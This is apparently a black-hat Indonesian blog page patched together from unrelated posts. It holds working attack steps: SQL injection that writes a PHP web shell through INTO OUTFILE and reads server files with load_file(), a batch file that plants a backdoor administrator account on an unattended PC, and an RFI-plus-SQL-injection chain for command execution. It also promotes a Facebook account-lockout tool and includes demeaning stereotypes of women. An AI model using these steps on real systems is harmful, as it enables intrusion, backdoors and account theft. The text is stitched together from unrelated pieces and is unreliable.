* 2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!

4. Execute shell commands

Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/

Hacking a Local Terminal

For the screenshots, I'll be using my Desktop PC and my Samsung Q1.

You will need a USB Flash Drive and a separate computer connected to the same network.

Wait until the target computer is available for use (maybe the person got up to check on something, who knows). As you enter the computer, you can do 2 things:

1) Have a batch ready on your flash drive. The code should be a little something like this:
@echo off
net user SupportUser codemachine /add
net localgroup administrators SupportUser /add


Good, this batch creates a backdoor administrator account on your target terminal. The second option was to do it by hand, but who wants to do that? The chances of having the time being cut short because of your flash drive being recognized are high, that's my opinion.

Go to the Control Panel > Administrative Tools > Services > Telnet
Make sure that the Telnet service is online.

Now scram, get out of there and head to your other computer. At a safe place, open up your Command prompt (or whatever you're using, I use Putty sometimes even though it sucks) and enter:
telnet 192.168.*.*

RFI over SQL Injection/Cross-Site Scripting

An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

SQL Injection per se didn’t allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented:

http:///?param=http:///?param=1+union+select+''&cmd=passthru('ls');

That is, each of these tree vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

reference:http://ptresearch.blogspot.com/2010/01/rfi-over-sql-injectioncross-site.html

Cewe dalam Ilmu Kimia

Corrosive

Cewe yang kurang suka melihat orang lain bahagia, dan bersifat 'korosif' bagi hubungan orang lain, dimana dia seringkali jadi orang ketiga dalam suatu pasangan, atau jadi penyebab rusaknya suatu hubungan pertemanan atau persahabatan orang lain. Cewe yang kurang bisa merawat barangnya sendiri, dan suka merusak barang orang lain / barang milik umum juga bisa dimasukkan pada kategori ini.


Oxidizer

Cewe yang bersifat sebagai 'oksidator' dalam suatu 'pembakaran', alias suka manas-manasin dalam suatu masalah (biasanya perselisihan) hingga satuorang atau lebih yang terlibat dalam masalah tersebut emosinya semakin meluap, atau suka bikin suatu masalah berbelit-belit sehingga masalah tersebut menjadi semakin sulit untuk dicari jalan keluarnya. Cewe seperti ini biasanya sangat senang melihatorang lain berantem dan suka turut campur dalam masalah orang lain.


Dangerous for the Environment

Cewe yang 'berbahaya bagi lingkungan (pandangan) sekitar', mungkin ditujukan bagi Cewe-Cewe yang norak atau 'alay', termasuk juga Cewe-Cewe yang jelek dan kurang enak untuk dipandang. Cewe seperti ini biasanya kurang bisa menjaga penampilan, dalam segi berpenampilan dapat dikatakan norak atau 'alay'; misalnya pergi ke mall memakai baju kampanye partai + jacket jeans + kacamata hitam murahan + celana hijau + highheels murahan, dandanannya menor, atau memakai baju dengan tulisan atau gambar yang norak, tidak jelas, atau 'maksa'. Termasuk juga Cewe yang bau karena malas mandi, atau jorok, atau juga Cewe yang jelek dan kurang enak untuk dipandang, tapi tetap 'keukeuh' memaksakan diri foto-foto alias narsis secara berlebihan. Kelakuan merekayang seperti ini seakan-akan membuat pandangan orang di sekitar menjadi 'gersang'.


Explosive

Cewe yang 'mudah meledak', maksudnya Cewe yang 'lebay', dimana Cewe ini sangat mudah terbawa perasaan. Contohnya ketika lagi sedih, dia nangis sampai teriak, guling-guling, atau merusak barang disekitar. Lagi marah atau berantem, dia sampai teriak-teriak hingga mengeluarkan kata-katayang kurang pantas. Lagi jatuh cinta dengan seseorang, dia 'mengejar' orang tersebut dengan agresifnya, bahkan hingga memaksa orang tersebut agar menjadi kekasihnya. Cewe seperti ini bisa jadi tontonan yang cukup 'mendebarkan', seperti halnya menonton suatu peristiwa ledakan.


Flammable

Cewe yang 'mudah terbakar' emosi, atau Cewe yang perasaannya sensitif ('sensian'). Misalnya kesal sedikit marah atau mengajak berantem, atau dipukul atau jatuh sedikit nangis. Termasukjuga Cewe yang sangat labil perasaannya dan sering 'geje' alias 'ga jelas' kelakuannya; marah-marah atau nangis tidak jelas. Cewe seperti ini biasanya gampang sekali mengajak berantem dan punya banyak musuh.


Toxic

Seperti lirik lagunya The Changcuters, wanita (Cewe) adalah racun (toksik) dunia. Namun istilah 'toksik' ini lebih spesifik, ditujukan bagi Ceweyang menjadi 'racun' bagi Cowo-Cowo disekitarnya. Cewe seperti ini umumnya berpenampilan menarik dan modis, namun dia suka memanfaatkan Cowo di sekitarnya bahkan menjadi Playgirl, alias Ceweyang suka memainkan Cowo. Beberapa Cewe ada juga yang dikategorikan sebagai Highly Toxic, yaitu Cewe yang 'sangat toksik', sebab dengan kelebihannya itu, dia mengajak Cowo di sekitarnya untuk melakukan hal-hal yang tidak baik dan diluar norma-norma, misalnya mengonsumsi narkoba atau seks bebas. Cewe seperti ini mungkin banyak ditemukan di klub-klub malam atau tempat-tempat dugem.


Harmful / Irritant

Cewe yang kelakuannya atau kata-katanya tajam, atau 'mengiritasi' orang di sekitarnya. Contohnya Cewe yang suka meremehkan orang lain dan menganggap orang lain rendah, dan suka bikin masalah di mana-mana. Cewe yang nakal, malas, kurang disiplin, dan meresahkan orang lain dapat masuk dalam kategori ini, sebab 'mengiritasi' sejumlah pihak, diantaranya orang tua, guru, atau masyarakat sekitar.


Carcinogenic

Karsinogenik berarti menyebabkan kanker, namun istilah kanker dalam hal ini diartikan sebagai 'kantong kering'. Cewe yang materialistis, mata duitan, boros, suka 'melorotin' Cowonya, dan banyak maunya, masuk dalam kategori ini. Cewe seperti ini diketahui dapat menimbulkan 'tumor ganas' dalam keuangan (hutang, Red.). Dilambangkan dengan simbol 'orang yang tubuhnya hancur', maksudnya berhubungan dengan Cewe semacam ini dapat 'menghancurkan' hidup Anda khususnya para Cowo, sebab mereka 'menyerang' salah satu aspek terpenting dalam hidup Anda, yaitu finansial.


Anda, khususnya para Cewe, termasuk pada kalangan yang manakah?

Sekedar Tips

1. buat recana yang matang dan segera laksanakan

“Anda harus memilih tujuan-tujuan jangka panjang agar terbebas dari frustasi akibat kegagalan-kegagalan jangka pendek”

“apapun yang anda lakukan, berusahalah untuk melakukan yang terbaik. Jika anda ingin menjadi gelandangan, jadilah gelandangan yang baik”

“Tidak ada gunanya menuliskan rencana secara rapi diatas kertas bila tidak pernah dilaksanakan”


2. hentikan copy-paste

“ia yang meghargai pekerjaannya akan menghasilkan sesuatu yang baik dari pekerjaannya”

“setiap pekerjaan adalah potret dari orang yang melakukannya. Buatlah potret diri yang terbaik”

3. buat artikel yang menurut pembaca menarik

“Dalam membuat keputusan, berpikirlah seakan-akan Anda adalah pemilik perusahaan”

“pencapaian yang terhebat adalah saat seseorang memberikan keuntungan bagi orang lain”

“orang lain tidak peduli sebesar apa pengetahuan anda, sampai mereka menyadari betapa besar kepedulian Anda terhadap mereka”

4. lakukan blogwalking

“nampaknya kesuksesan berhubungan dengan tindakan. Orang sukses senantiasa bergerak. Mereka kerap melakukan kesalahan, tapi tetap tidak menyerah."

5. terima semua komentar dengan pikiran positif

“Salah satu hal terberat adalah menerima kritik, dan memanfaatkannya”

6. nikmati perjalanan blogging anda

“saat mengikuti balapan untuk meraih posisi terbaik, jangan lupa untuk menikmati perjalanan yang dilalui”


7. tentukan topic blog

"Kehidupan itu seperti bola, anda tidak akan kemana-mana sebelum mengetahui posisi gawang lawan."

8.buat artikel yang up to date.

“hari-hari yang kita lalui itu seperti koper-koper, semua berukuran sama; tetapi sebagian orang dapat memasukkan lebih banyak benda ke dalam koper-kopernya dibandingkan orang lain”

9.jangan menyerah

“jika sebuah pekerjaan telah dimulai, jangan pernah meninggalkannya sebelum selesai. Jadilah pekerja yang baik dalam pekerjaan anda, lakukan yang terbaik atau tidak sama sekali."

10. jangan mengunakan Black SEO

“kejujuran adalah batu penjuru dalam segala kesuksesan, tanpanya kepercayaan dan kemampuan diri tidak akan ada

11. jangan bangga dengan pagerank tinggi tapi sedikit pengunjung

“lebih banyak kepuasan dan kehormatan menjadi sopir truk kelas satu dari pada sopr eksekutif kelas sepuluh”

12. jangan iri dengan blog orang lain

“rumput tetangga mungkin Nampak lebih hijau, tapi rumput tersebut tetap harus dirawat”

13. berikan komentar di blog lain

resep menuju kebodahonan abadi adalah : puas dengan pendapat anda dan merasa berkecukupan dengan pengetahuan anda”

14. jangan merasa cepat puas

“seseorang seharusnya berusaha meraih lebih daripada yang telah ia gengam”

15. jangan posting artikel basi

“jangan berjalan mengikuti jejak yang telah dibuat orang lain. Jelajahilah daerah yang baru dan tinggalkan jejak yang dapat diikuti oleh orang lain”

Cara Nge-hack Facebook Password.

Waduh judulnya serem bener Cara Nge-hack Facebook. Apa bisa menghack password facebook seseorang?. Jawabannya bisa, tapi ini hanya sebagai pembelajaran tolong jangan digunakan untuk iseng dan merugikan orang lain ya. Untuk Ngehack account facebook anda bisa menggunakan GZ’s Facebook. Cara kerjanya cukup simple, kita tinggal ketikan e-mail dari akun si yang punya facebook, kemudian klik Freeze. Nah ditunggu beberapa saat. Hasilnya, password si yang punya facebook akan berubah, dan dia tidak bisa kembali masuk ke dalam facebook miliknya (kejam bener!!!). Apabila kamu ingin mencobanya, silahkan download dulu software yang akan saya berikan dan coba pada account facebook kamu, tapi saya tidak bertanggung jawab apabila account kamu tidak bisa diakses.



Sekali lagi saya katakan :

Jangan Menggunakan software ini untuk mengerjai teman atau merugikan orang lain. Tips ini hanya untuk menambah wawasan saja. Silahkan Download software hack facebook (download).

.:GOOGLE_HACK:.

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.


--- 01 // Penggunaan Dasar ------------

- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR c**c*er
Hasilnya pencarian akan mengandung kata "hacker" atau "c**c*er"

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda
bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan

- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
"linus tanpa linux", kita bisa menggunakan "linus -linux"

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll
Google akan menghasilkan pencarian hanya yang mengandung kata
"menja".

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: "menjadi * hacker"
Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",
"menjadi white hacker", dll.

- "": Dapat digunakan untuk mencari kata yg lengkap.
Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3



--- 02 // Operator Spesial ---------------

-- Contoh hasil pencarian --

Google --> Judul
... Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 --> URL

-- Contoh hasil pencarian --


- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan
deskripsi "Administrasi"

- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata "Admin" dan "Administrasi"

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dan "Administrasi"

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"

- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: "hacker" filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com


--- 03 // Manipulasi URL Google ---------------

> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aecho.or.id&btnG=Search

> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aecho.or.id&btnG=Search

> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL :D
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aecho.or.id&btnG=Search

> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aecho.or.id&btnG=Search

> safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri :D
Karena bandwidth di Indonesia mahal ........

Contoh script google.html lengkap dengan varabielnya.

--- BOF google.html ---


Variabel num:

Variabel hl:

Variabel lr:

Variabel as_qdr:

Variabel safe:






--- EOF google.html ---


Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda :D
Berikut merupakan script default pencarian google.

--- BOF google.html ---







--- EOF google.html ---

Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com


--- 04 // Tips & Tricks -----------------

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.

Ex:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan
semua site echo.or.id yang mengandung kata hacker.

Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md
R3B3L - Design by : R3B3L @ 2010 - 2011 All Rights Reserved [+] We Are Black Hat [+]